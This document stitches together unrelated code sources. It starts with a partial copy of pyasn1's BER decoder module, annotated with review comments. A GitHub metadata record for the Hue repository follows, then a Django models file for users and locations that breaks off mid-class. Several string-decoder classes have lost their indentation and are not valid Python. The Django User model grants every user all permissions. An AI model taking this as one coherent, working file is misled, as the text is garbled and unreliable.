                                    asn1Object.getComponentByPosition(idx).asOctets(),
                                    asn1Spec=openType, **dict(options, allowEoo=True)
                                )
                                if component is not eoo.endOfOctets:
                                    asn1Object.setComponentByPosition(idx, component)
            else:
                asn1Object.verifySizeSpec()
        else:
            asn1Object = asn1Spec.clone()
            asn1Object.clear()
            componentType = asn1Spec.componentType
            if LOG:
                LOG('decoding type %r chosen by given `asn1Spec`' % componentType)
            idx = 0
            while substrate:
                component, substrate = decodeFun(substrate, componentType, allowEoo=True, **options)
                if component is eoo.endOfOctets:
                    break
                asn1Object.setComponentByPosition(
                    idx, component,
                    verifyConstraints=False,
                    matchTags=False, matchConstraints=False
                )
                idx += 1
            else:
                # while-else: substrate ran out without an EOO marker.
                raise error.SubstrateUnderrunError(
                    'No EOO seen before substrate ends'
                )
        return asn1Object, substrate
# Concrete SEQUENCE/SET family decoders: all behavior lives in
# UniversalConstructedTypeDecoder; these classes only pick the prototypes.
class SequenceOrSequenceOfDecoder(UniversalConstructedTypeDecoder):
    protoRecordComponent = univ.Sequence()
    protoSequenceComponent = univ.SequenceOf()
class SequenceDecoder(SequenceOrSequenceOfDecoder):
    protoComponent = univ.Sequence()
class SequenceOfDecoder(SequenceOrSequenceOfDecoder):
    protoComponent = univ.SequenceOf()
class SetOrSetOfDecoder(UniversalConstructedTypeDecoder):
    protoRecordComponent = univ.Set()
    protoSequenceComponent = univ.SetOf()
class SetDecoder(SetOrSetOfDecoder):
    protoComponent = univ.Set()
class SetOfDecoder(SetOrSetOfDecoder):
    protoComponent = univ.SetOf()
class ChoiceDecoder(AbstractConstructedDecoder):
    """Decode a CHOICE: pick the alternative matching the inner tag.

    NOTE(review): valueDecoder consults ``asn1Object.componentTagMap`` while
    indefLenValueDecoder uses ``asn1Object.componentType.tagMapUnique`` --
    cannot confirm from this chunk whether the asymmetry is intentional.
    """
    protoComponent = univ.Choice()
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        """Decode a definite-length CHOICE value."""
        head, tail = substrate[:length], substrate[length:]
        if asn1Spec is None:
            asn1Object = self.protoComponent.clone(tagSet=tagSet)
        else:
            asn1Object = asn1Spec.clone()
        if substrateFun:
            return substrateFun(asn1Object, substrate, length)
        if asn1Object.tagSet == tagSet:
            # Outer tag belongs to the CHOICE itself (explicit tagging):
            # decode the wrapped alternative from the content octets.
            if LOG:
                LOG('decoding %s as explicitly tagged CHOICE' % (tagSet,))
            component, head = decodeFun(
                head, asn1Object.componentTagMap, **options
            )
        else:
            # Untagged CHOICE: the observed tag already identifies the
            # selected alternative.
            if LOG:
                LOG('decoding %s as untagged CHOICE' % (tagSet,))
            component, head = decodeFun(
                head, asn1Object.componentTagMap,
                tagSet, length, state, **options
            )
        effectiveTagSet = component.effectiveTagSet
        if LOG:
            LOG('decoded component %s, effective tag set %s' % (component, effectiveTagSet))
        asn1Object.setComponentByType(
            effectiveTagSet, component,
            verifyConstraints=False,
            matchTags=False, matchConstraints=False,
            innerFlag=False
        )
        return asn1Object, tail
    def indefLenValueDecoder(self, substrate, asn1Spec,
                             tagSet=None, length=None, state=None,
                             decodeFun=None, substrateFun=None,
                             **options):
        """Decode an indefinite-length CHOICE value."""
        if asn1Spec is None:
            asn1Object = self.protoComponent.clone(tagSet=tagSet)
        else:
            asn1Object = asn1Spec.clone()
        if substrateFun:
            return substrateFun(asn1Object, substrate, length)
        if asn1Object.tagSet == tagSet:
            if LOG:
                LOG('decoding %s as explicitly tagged CHOICE' % (tagSet,))
            component, substrate = decodeFun(
                substrate, asn1Object.componentType.tagMapUnique, **options
            )
            # eat up EOO marker
            eooMarker, substrate = decodeFun(
                substrate, allowEoo=True, **options
            )
            if eooMarker is not eoo.endOfOctets:
                raise error.PyAsn1Error('No EOO seen before substrate ends')
        else:
            if LOG:
                LOG('decoding %s as untagged CHOICE' % (tagSet,))
            component, substrate = decodeFun(
                substrate, asn1Object.componentType.tagMapUnique,
                tagSet, length, state, **options
            )
        effectiveTagSet = component.effectiveTagSet
        if LOG:
            LOG('decoded component %s, effective tag set %s' % (component, effectiveTagSet))
        asn1Object.setComponentByType(
            effectiveTagSet, component,
            verifyConstraints=False,
            matchTags=False, matchConstraints=False,
            innerFlag=False
        )
        return asn1Object, substrate
class AnyDecoder(AbstractSimpleDecoder):
    """Decode ANY: capture the raw serialization, header octets included
    when the value is untagged (so it can be re-decoded later)."""
    protoComponent = univ.Any()
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        """Decode a definite-length ANY value."""
        if asn1Spec is None:
            isUntagged = True
        elif asn1Spec.__class__ is tagmap.TagMap:
            isUntagged = tagSet not in asn1Spec.tagMap
        else:
            isUntagged = tagSet != asn1Spec.tagSet
        if isUntagged:
            fullSubstrate = options['fullSubstrate']
            # untagged Any container, recover inner header substrate
            length += len(fullSubstrate) - len(substrate)
            substrate = fullSubstrate
            if LOG:
                LOG('decoding as untagged ANY, substrate %s' % debug.hexdump(substrate))
        if substrateFun:
            return substrateFun(self._createComponent(asn1Spec, tagSet, noValue, **options),
                                substrate, length)
        head, tail = substrate[:length], substrate[length:]
        return self._createComponent(asn1Spec, tagSet, head, **options), tail
    def indefLenValueDecoder(self, substrate, asn1Spec,
                             tagSet=None, length=None, state=None,
                             decodeFun=None, substrateFun=None,
                             **options):
        """Decode an indefinite-length ANY value by concatenating fragments
        up to the end-of-octets marker."""
        if asn1Spec is None:
            isTagged = False
        elif asn1Spec.__class__ is tagmap.TagMap:
            isTagged = tagSet in asn1Spec.tagMap
        else:
            isTagged = tagSet == asn1Spec.tagSet
        if isTagged:
            # tagged Any type -- consume header substrate
            header = null
            if LOG:
                LOG('decoding as tagged ANY')
        else:
            fullSubstrate = options['fullSubstrate']
            # untagged Any, recover header substrate
            header = fullSubstrate[:-len(substrate)]
            if LOG:
                LOG('decoding as untagged ANY, header substrate %s' % debug.hexdump(header))
        # Any components do not inherit initial tag
        asn1Spec = self.protoComponent
        if substrateFun and substrateFun is not self.substrateCollector:
            asn1Object = self._createComponent(asn1Spec, tagSet, noValue, **options)
            return substrateFun(asn1Object, header + substrate, length + len(header))
        if LOG:
            LOG('assembling constructed serialization')
        # All inner fragments are of the same type, treat them as octet string
        substrateFun = self.substrateCollector
        while substrate:
            component, substrate = decodeFun(substrate, asn1Spec,
                                             substrateFun=substrateFun,
                                             allowEoo=True, **options)
            if component is eoo.endOfOctets:
                break
            header += component
        else:
            # while-else: substrate ran out without an EOO marker.
            raise error.SubstrateUnderrunError(
                'No EOO seen before substrate ends'
            )
        if substrateFun:
            return header, substrate
        else:
            return self._createComponent(asn1Spec, tagSet, header, **options), substrate
# character string types
class UTF8StringDecoder(OctetStringDecoder):
protoComponent = char.UTF8String()
class NumericStringDecoder(OctetStringDecoder):
protoComponent = char.NumericString()
class PrintableStringDecoder(OctetStringDecoder):
protoComponent = char.PrintableString()
class TeletexStringDecoder(OctetStringDecoder):
protoComponent = char.TeletexString()
class VideotexStringDecoder(OctetStringDecoder):
protoComponent = char.VideotexString()
class IA5StringDecoder(OctetStringDecoder):
protoComponent = char.IA5String()
class GraphicStringDecoder(OctetStringDecoder):
protoComponent = char.GraphicString()
class VisibleStringDecoder(OctetStringDecoder):
protoComponent = char.VisibleString()
class GeneralStringDecoder(OctetStringDecoder):
protoComponent = char.GeneralString()
class UniversalStringDecoder(OctetStringDecoder):
protoComponent = char.UniversalString()
class BMPStringDecoder(OctetStringDecoder):
protoComponent = char.BMPString()
# "useful" types
class ObjectDescriptorDecoder(OctetStringDecoder):
protoComponent = useful.ObjectDescriptor()
class GeneralizedTimeDecoder(OctetStringDecoder):
protoComponent = useful.GeneralizedTime()
class UTCTimeDecoder(OctetStringDecoder):
    """Decoder for UTCTime; inherits all decoding logic from OctetStringDecoder."""
    protoComponent = useful.UTCTime()
# Tag-driven codec registry: maps a type's tagSet to its decoder singleton.
# Consulted when decoding is guided by tags found in the substrate (no
# asn1Spec supplied by the caller).
tagMap = {
    univ.Integer.tagSet: IntegerDecoder(),
    univ.Boolean.tagSet: BooleanDecoder(),
    univ.BitString.tagSet: BitStringDecoder(),
    univ.OctetString.tagSet: OctetStringDecoder(),
    univ.Null.tagSet: NullDecoder(),
    univ.ObjectIdentifier.tagSet: ObjectIdentifierDecoder(),
    univ.Enumerated.tagSet: IntegerDecoder(),
    univ.Real.tagSet: RealDecoder(),
    univ.Sequence.tagSet: SequenceOrSequenceOfDecoder(),  # conflicts with SequenceOf
    univ.Set.tagSet: SetOrSetOfDecoder(),  # conflicts with SetOf
    univ.Choice.tagSet: ChoiceDecoder(),  # conflicts with Any
    # character string types
    char.UTF8String.tagSet: UTF8StringDecoder(),
    char.NumericString.tagSet: NumericStringDecoder(),
    char.PrintableString.tagSet: PrintableStringDecoder(),
    char.TeletexString.tagSet: TeletexStringDecoder(),
    char.VideotexString.tagSet: VideotexStringDecoder(),
    char.IA5String.tagSet: IA5StringDecoder(),
    char.GraphicString.tagSet: GraphicStringDecoder(),
    char.VisibleString.tagSet: VisibleStringDecoder(),
    char.GeneralString.tagSet: GeneralStringDecoder(),
    char.UniversalString.tagSet: UniversalStringDecoder(),
    char.BMPString.tagSet: BMPStringDecoder(),
    # useful types
    useful.ObjectDescriptor.tagSet: ObjectDescriptorDecoder(),
    useful.GeneralizedTime.tagSet: GeneralizedTimeDecoder(),
    useful.UTCTime.tagSet: UTCTimeDecoder()
}
# Type-to-codec map for ambiguous ASN.1 types
# (types whose tags alone cannot distinguish them, e.g. Set vs SetOf);
# keyed by pyasn1 typeId rather than tagSet.
typeMap = {
    univ.Set.typeId: SetDecoder(),
    univ.SetOf.typeId: SetOfDecoder(),
    univ.Sequence.typeId: SequenceDecoder(),
    univ.SequenceOf.typeId: SequenceOfDecoder(),
    univ.Choice.typeId: ChoiceDecoder(),
    univ.Any.typeId: AnyDecoder()
}
# Put in non-ambiguous types for faster codec lookup
for typeDecoder in tagMap.values():
    if typeDecoder.protoComponent is not None:
        typeId = typeDecoder.protoComponent.__class__.typeId
        if typeId is not None and typeId not in typeMap:
            # register by typeId only if not already claimed by an ambiguous type above
            typeMap[typeId] = typeDecoder
# Decoder state-machine states, enumerated 0..9.
# Idiom fix: unpack range() directly instead of copying it through a
# redundant identity list comprehension ([x for x in range(10)]).
(stDecodeTag,
 stDecodeLength,
 stGetValueDecoder,
 stGetValueDecoderByAsn1Spec,
 stGetValueDecoderByTag,
 stTryAsExplicitTag,
 stDecodeValue,
 stDumpRawValue,
 stErrorCondition,
 stStop) = range(10)
class Decoder(object):
    """BER decoder driver: a state machine turning an octet stream into
    pyasn1 objects.

    One ``__call__`` decodes a single TLV off the head of the substrate,
    stepping through the module-level ``st*`` states: decode tag, decode
    length, pick a codec (by tag or by supplied asn1Spec), then delegate
    value decoding to that codec (which may recurse back into this object
    for constructed types).
    """
    defaultErrorState = stErrorCondition
    #defaultErrorState = stDumpRawValue
    defaultRawDecoder = AnyDecoder()
    supportIndefLength = True
    # noinspection PyDefaultArgument
    def __init__(self, tagMap, typeMap={}):
        """Capture the tagSet->codec and typeId->codec maps to decode with.

        NOTE(review): the mutable default ``typeMap={}`` is safe only as
        long as this class never mutates it — which the visible code does not.
        """
        self.__tagMap = tagMap
        self.__typeMap = typeMap
        # Tag & TagSet objects caches
        self.__tagCache = {}
        self.__tagSetCache = {}
        # two zero octets: the BER end-of-octets marker for indefinite lengths
        self.__eooSentinel = ints2octs((0, 0))
    def __call__(self, substrate, asn1Spec=None,
                 tagSet=None, length=None, state=stDecodeTag,
                 decodeFun=None, substrateFun=None,
                 **options):
        """Decode one value from ``substrate``.

        Returns a ``(value, remainingSubstrate)`` pair. Raises
        ``error.SubstrateUnderrunError`` on truncated input and
        ``error.PyAsn1Error`` on unresolvable encodings.
        """
        if LOG:
            LOG('decoder called at scope %s with state %d, working with up to %d octets of substrate: %s' % (debug.scope, state, len(substrate), debug.hexdump(substrate)))
        allowEoo = options.pop('allowEoo', False)
        # Look for end-of-octets sentinel
        if allowEoo and self.supportIndefLength:
            if substrate[:2] == self.__eooSentinel:
                if LOG:
                    LOG('end-of-octets sentinel found')
                return eoo.endOfOctets, substrate[2:]
        value = noValue
        # hoist instance attributes into locals for the decode loop
        tagMap = self.__tagMap
        typeMap = self.__typeMap
        tagCache = self.__tagCache
        tagSetCache = self.__tagSetCache
        fullSubstrate = substrate
        while state is not stStop:
            if state is stDecodeTag:
                if not substrate:
                    raise error.SubstrateUnderrunError(
                        'Short octet stream on tag decoding'
                    )
                # Decode tag
                isShortTag = True
                firstOctet = substrate[0]
                substrate = substrate[1:]
                try:
                    lastTag = tagCache[firstOctet]
                except KeyError:
                    integerTag = oct2int(firstOctet)
                    tagClass = integerTag & 0xC0
                    tagFormat = integerTag & 0x20
                    tagId = integerTag & 0x1F
                    if tagId == 0x1F:
                        # high-tag-number form: tag id continues in base-128
                        # octets, MSB set on all but the last octet
                        isShortTag = False
                        lengthOctetIdx = 0
                        tagId = 0
                        try:
                            while True:
                                integerTag = oct2int(substrate[lengthOctetIdx])
                                lengthOctetIdx += 1
                                tagId <<= 7
                                tagId |= (integerTag & 0x7F)
                                if not integerTag & 0x80:
                                    break
                            substrate = substrate[lengthOctetIdx:]
                        except IndexError:
                            raise error.SubstrateUnderrunError(
                                'Short octet stream on long tag decoding'
                            )
                    lastTag = tag.Tag(
                        tagClass=tagClass, tagFormat=tagFormat, tagId=tagId
                    )
                    if isShortTag:
                        # cache short tags
                        tagCache[firstOctet] = lastTag
                if tagSet is None:
                    if isShortTag:
                        try:
                            tagSet = tagSetCache[firstOctet]
                        except KeyError:
                            # base tag not recovered
                            tagSet = tag.TagSet((), lastTag)
                            tagSetCache[firstOctet] = tagSet
                    else:
                        tagSet = tag.TagSet((), lastTag)
                else:
                    # nested/explicit tagging: prepend the newly seen tag
                    tagSet = lastTag + tagSet
                state = stDecodeLength
                if LOG:
                    LOG('tag decoded into %s, decoding length' % tagSet)
            if state is stDecodeLength:
                # Decode length
                if not substrate:
                    raise error.SubstrateUnderrunError(
                        'Short octet stream on length decoding'
                    )
                firstOctet = oct2int(substrate[0])
                if firstOctet < 128:
                    # short definite form: length fits in this one octet
                    size = 1
                    length = firstOctet
                elif firstOctet > 128:
                    # long definite form: low 7 bits give the octet count
                    size = firstOctet & 0x7F
                    # encoded in size bytes
                    encodedLength = octs2ints(substrate[1:size + 1])
                    # missing check on maximum size, which shouldn't be a
                    # problem, we can handle more than is possible
                    if len(encodedLength) != size:
                        raise error.SubstrateUnderrunError(
                            '%s<%s at %s' % (size, len(encodedLength), tagSet)
                        )
                    length = 0
                    for lengthOctet in encodedLength:
                        length <<= 8
                        length |= lengthOctet
                    size += 1
                else:
                    # firstOctet == 0x80: indefinite form, flagged as -1
                    size = 1
                    length = -1
                substrate = substrate[size:]
                if length == -1:
                    if not self.supportIndefLength:
                        raise error.PyAsn1Error('Indefinite length encoding not supported by this codec')
                else:
                    if len(substrate) < length:
                        raise error.SubstrateUnderrunError('%d-octet short' % (length - len(substrate)))
                state = stGetValueDecoder
                if LOG:
                    LOG('value length decoded into %d, payload substrate is: %s' % (length, debug.hexdump(length == -1 and substrate or substrate[:length])))
            if state is stGetValueDecoder:
                if asn1Spec is None:
                    state = stGetValueDecoderByTag
                else:
                    state = stGetValueDecoderByAsn1Spec
            #
            # There're two ways of creating subtypes in ASN.1 what influences
            # decoder operation. These methods are:
            # 1) Either base types used in or no IMPLICIT tagging has been
            #    applied on subtyping.
            # 2) Subtype syntax drops base type information (by means of
            #    IMPLICIT tagging.
            # The first case allows for complete tag recovery from substrate
            # while the second one requires original ASN.1 type spec for
            # decoding.
            #
            # In either case a set of tags (tagSet) is coming from substrate
            # in an incremental, tag-by-tag fashion (this is the case of
            # EXPLICIT tag which is most basic). Outermost tag comes first
            # from the wire.
            #
            if state is stGetValueDecoderByTag:
                try:
                    concreteDecoder = tagMap[tagSet]
                except KeyError:
                    concreteDecoder = None
                if concreteDecoder:
                    state = stDecodeValue
                else:
                    # fall back to matching by the outermost tag only
                    try:
                        concreteDecoder = tagMap[tagSet[:1]]
                    except KeyError:
                        concreteDecoder = None
                    if concreteDecoder:
                        state = stDecodeValue
                    else:
                        state = stTryAsExplicitTag
                if LOG:
                    LOG('codec %s chosen by a built-in type, decoding %s' % (concreteDecoder and concreteDecoder.__class__.__name__ or "<none>", state is stDecodeValue and 'value' or 'as explicit tag'))
                    debug.scope.push(concreteDecoder is None and '?' or concreteDecoder.protoComponent.__class__.__name__)
            if state is stGetValueDecoderByAsn1Spec:
                if asn1Spec.__class__ is tagmap.TagMap:
                    try:
                        chosenSpec = asn1Spec[tagSet]
                    except KeyError:
                        chosenSpec = None
                    if LOG:
                        LOG('candidate ASN.1 spec is a map of:')
                        for firstOctet, v in asn1Spec.presentTypes.items():
                            LOG(' %s -> %s' % (firstOctet, v.__class__.__name__))
                        if asn1Spec.skipTypes:
                            LOG('but neither of: ')
                            for firstOctet, v in asn1Spec.skipTypes.items():
                                LOG(' %s -> %s' % (firstOctet, v.__class__.__name__))
                        LOG('new candidate ASN.1 spec is %s, chosen by %s' % (chosenSpec is None and '<none>' or chosenSpec.prettyPrintType(), tagSet))
                elif tagSet == asn1Spec.tagSet or tagSet in asn1Spec.tagMap:
                    chosenSpec = asn1Spec
                    if LOG:
                        LOG('candidate ASN.1 spec is %s' % asn1Spec.__class__.__name__)
                else:
                    chosenSpec = None
                if chosenSpec is not None:
                    try:
                        # ambiguous type or just faster codec lookup
                        concreteDecoder = typeMap[chosenSpec.typeId]
                        if LOG:
                            LOG('value decoder chosen for an ambiguous type by type ID %s' % (chosenSpec.typeId,))
                    except KeyError:
                        # use base type for codec lookup to recover untagged types
                        baseTagSet = tag.TagSet(chosenSpec.tagSet.baseTag, chosenSpec.tagSet.baseTag)
                        try:
                            # base type or tagged subtype
                            concreteDecoder = tagMap[baseTagSet]
                            if LOG:
                                LOG('value decoder chosen by base %s' % (baseTagSet,))
                        except KeyError:
                            concreteDecoder = None
                    if concreteDecoder:
                        asn1Spec = chosenSpec
                        state = stDecodeValue
                    else:
                        state = stTryAsExplicitTag
                else:
                    concreteDecoder = None
                    state = stTryAsExplicitTag
                if LOG:
                    LOG('codec %s chosen by ASN.1 spec, decoding %s' % (state is stDecodeValue and concreteDecoder.__class__.__name__ or "<none>", state is stDecodeValue and 'value' or 'as explicit tag'))
                    debug.scope.push(chosenSpec is None and '?' or chosenSpec.__class__.__name__)
            if state is stDecodeValue:
                if not options.get('recursiveFlag', True) and not substrateFun: # deprecate this
                    substrateFun = lambda a, b, c: (a, b[:c])
                options.update(fullSubstrate=fullSubstrate)
                if length == -1: # indef length
                    value, substrate = concreteDecoder.indefLenValueDecoder(
                        substrate, asn1Spec,
                        tagSet, length, stGetValueDecoder,
                        self, substrateFun,
                        **options
                    )
                else:
                    value, substrate = concreteDecoder.valueDecoder(
                        substrate, asn1Spec,
                        tagSet, length, stGetValueDecoder,
                        self, substrateFun,
                        **options
                    )
                if LOG:
                    LOG('codec %s yields type %s, value:\n%s\n...remaining substrate is: %s' % (concreteDecoder.__class__.__name__, value.__class__.__name__, isinstance(value, base.Asn1Item) and value.prettyPrint() or value, substrate and debug.hexdump(substrate) or '<none>'))
                state = stStop
                break
            if state is stTryAsExplicitTag:
                if (tagSet and
                        tagSet[0].tagFormat == tag.tagFormatConstructed and
                        tagSet[0].tagClass != tag.tagClassUniversal):
                    # Assume explicit tagging
                    concreteDecoder = explicitTagDecoder
                    state = stDecodeValue
                else:
                    concreteDecoder = None
                    state = self.defaultErrorState
                if LOG:
                    LOG('codec %s chosen, decoding %s' % (concreteDecoder and concreteDecoder.__class__.__name__ or "<none>", state is stDecodeValue and 'value' or 'as failure'))
            if state is stDumpRawValue:
                # salvage path: decode the unrecognized TLV as an opaque Any
                concreteDecoder = self.defaultRawDecoder
                if LOG:
                    LOG('codec %s chosen, decoding value' % concreteDecoder.__class__.__name__)
                state = stDecodeValue
            if state is stErrorCondition:
                raise error.PyAsn1Error(
                    '%s not in asn1Spec: %r' % (tagSet, asn1Spec)
                )
        if LOG:
            debug.scope.pop()
            LOG('decoder left scope %s, call completed' % debug.scope)
        return value, substrate
#: Turns BER octet stream into an ASN.1 object.
#:
#: Takes BER octet-stream and decode it into an ASN.1 object
#: (e.g. :py:class:`~pyasn1.type.base.PyAsn1Item` derivative) which
#: may be a scalar or an arbitrary nested structure.
#:
#: Parameters
#: ----------
#: substrate: :py:class:`bytes` (Python 3) or :py:class:`str` (Python 2)
#: BER octet-stream
#:
#: Keyword Args
#: ------------
#: asn1Spec: any pyasn1 type object e.g. :py:class:`~pyasn1.type.base.PyAsn1Item` derivative
#: A pyasn1 type object to act as a template guiding the decoder. Depending on the ASN.1 structure
#: being decoded, *asn1Spec* may or may not be required. Most common reason for
#: it to require is that ASN.1 structure is encoded in *IMPLICIT* tagging mode.
#:
#: Returns
#: -------
#: : :py:class:`tuple`
#: A tuple of pyasn1 object recovered from BER substrate (:py:class:`~pyasn1.type.base.PyAsn1Item` derivative)
#: and the unprocessed trailing portion of the *substrate* (may be empty)
#:
#: Raises
#: ------
#: ~pyasn1.error.PyAsn1Error, ~pyasn1.error.SubstrateUnderrunError
#: On decoding errors
#:
#: Examples
#: --------
#: Decode BER serialisation without ASN.1 schema
#:
#: .. code-block:: pycon
#:
#: >>> s, _ = decode(b'0\t\x02\x01\x01\x02\x01\x02\x02\x01\x03')
#: >>> str(s)
#: SequenceOf:
#: 1 2 3
#:
#: Decode BER serialisation with ASN.1 schema
#:
#: .. code-block:: pycon
#:
#: >>> seq = SequenceOf(componentType=Integer())
#: >>> s, _ = decode(b'0\t\x02\x01\x01\x02\x01\x02\x02\x01\x03', asn1Spec=seq)
#: >>> str(s)
#: SequenceOf:
#: 1 2 3
#:
# Module-level singleton: the public BER ``decode()`` callable documented above.
decode = Decoder(tagMap, typeMap)
# XXX
# non-recursive decoding; return position rather than substrate
| {
"content_hash": "f357e8a473eb0df789b50edc39585758",
"timestamp": "",
"source": "github",
"line_count": 1644,
"max_line_length": 277,
"avg_line_length": 35.2147201946472,
"alnum_prop": 0.5351769643998411,
"repo_name": "kawamon/hue",
"id": "3f2d180d1d8556b71b2d24c354a4c54605bb15b0",
"size": "58050",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/pyasn1-0.4.6/pyasn1/codec/ber/decoder.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "5786"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "Batchfile",
"bytes": "118907"
},
{
"name": "C",
"bytes": "3196521"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "308860"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "1050129"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "D",
"bytes": "324"
},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "10981"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "411907"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "7312"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "24999718"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "HiveQL",
"bytes": "43"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "JSONiq",
"bytes": "4"
},
{
"name": "Java",
"bytes": "471854"
},
{
"name": "JavaScript",
"bytes": "28075556"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "Jupyter Notebook",
"bytes": "73168"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Lex",
"bytes": "264449"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "78382"
},
{
"name": "M4",
"bytes": "1377"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "269655"
},
{
"name": "Mako",
"bytes": "3614942"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "31565"
},
{
"name": "PLpgSQL",
"bytes": "6006"
},
{
"name": "Pascal",
"bytes": "1412"
},
{
"name": "Perl",
"bytes": "4327"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
"bytes": "3204"
},
{
"name": "Python",
"bytes": "76440000"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "95764"
},
{
"name": "Ruby",
"bytes": "1098"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "Scala",
"bytes": "1541"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "190718"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "TSQL",
"bytes": "10013"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "165743"
},
{
"name": "Thrift",
"bytes": "317058"
},
{
"name": "TypeScript",
"bytes": "1607"
},
{
"name": "VBA",
"bytes": "2884"
},
{
"name": "VBScript",
"bytes": "938"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Vim Snippet",
"bytes": "226931"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "521413"
},
{
"name": "Yacc",
"bytes": "2133855"
}
],
"symlink_target": ""
} |
import datetime
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from users.managers import UserManager
class User(AbstractBaseUser):
    """Site user / customer (original docstring: "Покупатель" = buyer).
    Role is encoded in ``status``; the role properties below gate admin
    access and wholesale pricing.
    """
    # Account roles used by ``status``.
    STATUS_ADMIN = 0
    STATUS_CUSTOMER = 1
    STATUS_WHOLESALE = 2
    STATUS_FRANCHISEE = 3
    STATUS_CHOICES = (
        (STATUS_ADMIN, u'Администратор'),
        (STATUS_CUSTOMER, u'Розничный покупатель'),
        (STATUS_WHOLESALE, u'Оптовый покупатель'),
        (STATUS_FRANCHISEE, u'Франчайзи'),
    )
    # ``email`` doubles as the login (see USERNAME_FIELD below).
    email = models.EmailField(u'E-mail', unique=True, db_index=True)
    # New accounts start inactive; save() force-activates admins.
    is_active = models.BooleanField(default=False, db_index=True)
    title = models.CharField(u'ФИО', max_length=255, blank=True)
    phone = models.CharField(u'Телефон', max_length=50, blank=True)
    birthday = models.DateField(u'Дата рождения', blank=True, null=True)
    status = models.PositiveSmallIntegerField(u'Тип', choices=STATUS_CHOICES, default=STATUS_CUSTOMER,
                                              db_index=True)
    created = models.DateTimeField(u'Дата регистрации', default=datetime.datetime.now)
    objects = UserManager()
    class Meta:
        db_table = u'users_user'
        verbose_name = u'пользователь'
        verbose_name_plural = u'пользователи'
    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = ()
    def get_full_name(self):
        # AbstractBaseUser contract; the single ``title`` field holds the full name.
        return self.title
    def get_short_name(self):
        # Same as the full name — no separate short-name field exists.
        return self.title
    @property
    def is_staff(self):
        # Django admin uses ``is_staff`` to grant admin-site access.
        return self.status == self.STATUS_ADMIN
    @property
    def is_customer(self):
        return self.status == self.STATUS_CUSTOMER
    @property
    def is_wholesale(self):
        return self.status == self.STATUS_WHOLESALE
    @property
    def is_franchisee(self):
        return self.status == self.STATUS_FRANCHISEE
    def show_wholesale(self):
        # Wholesale pricing is visible to wholesale buyers and franchisees alike.
        return self.status in (self.STATUS_WHOLESALE, self.STATUS_FRANCHISEE)
    def has_perm(self, obj=None):
        # NOTE(review): Django's convention is has_perm(self, perm, obj=None);
        # here the permission string lands in ``obj``. Harmless since every
        # permission is granted unconditionally — confirm before changing.
        return True
    def has_module_perms(self, app_label):
        # All users are reported as having access to every app's module.
        return True
    def save(self, *args, **kwargs):
        # Admin accounts are always forced active on save.
        if self.status == self.STATUS_ADMIN:
            self.is_active = True
        return super(User, self).save(*args, **kwargs)
class Country(models.Model):
    """Country reference record (top of the Country > Region > City chain)."""
    title = models.CharField(u'Название', max_length=50)

    def __unicode__(self):
        # Consistency fix: City defines __unicode__ but Country did not, so
        # related widgets rendered the default "Country object" label.
        return self.title
class Region(models.Model):
    """Region reference record; belongs to a Country."""
    country = models.ForeignKey(Country)
    title = models.CharField(u'Название', max_length=255)

    def __unicode__(self):
        # Consistency fix: City defines __unicode__ but Region did not, so
        # related widgets rendered the default "Region object" label.
        return self.title
class City(models.Model):
    """City reference record; belongs to a Region."""
    region = models.ForeignKey(Region)
